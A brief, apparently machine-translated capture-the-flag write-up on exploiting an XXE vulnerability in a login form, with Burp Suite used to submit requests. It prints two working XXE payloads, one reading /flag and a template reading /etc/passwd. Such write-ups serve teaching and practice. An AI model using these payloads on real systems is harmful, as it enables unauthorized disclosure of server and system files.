Exploit the vulnerability to read files XXE
Reference: https://www.jianshu.com/p/4fc721398e97
First, find the login source code as follows:
The title can take advantage of the vulnerability to read files XXE
First log in with Burp Suite Ethereal:
Then read the file structure XXE
Statement is as follows:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "/flag">
]>
<user>
<username>&f;</username>
<password>024b87931a03f738fff6693ce0a78c88</password>
</user
template:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>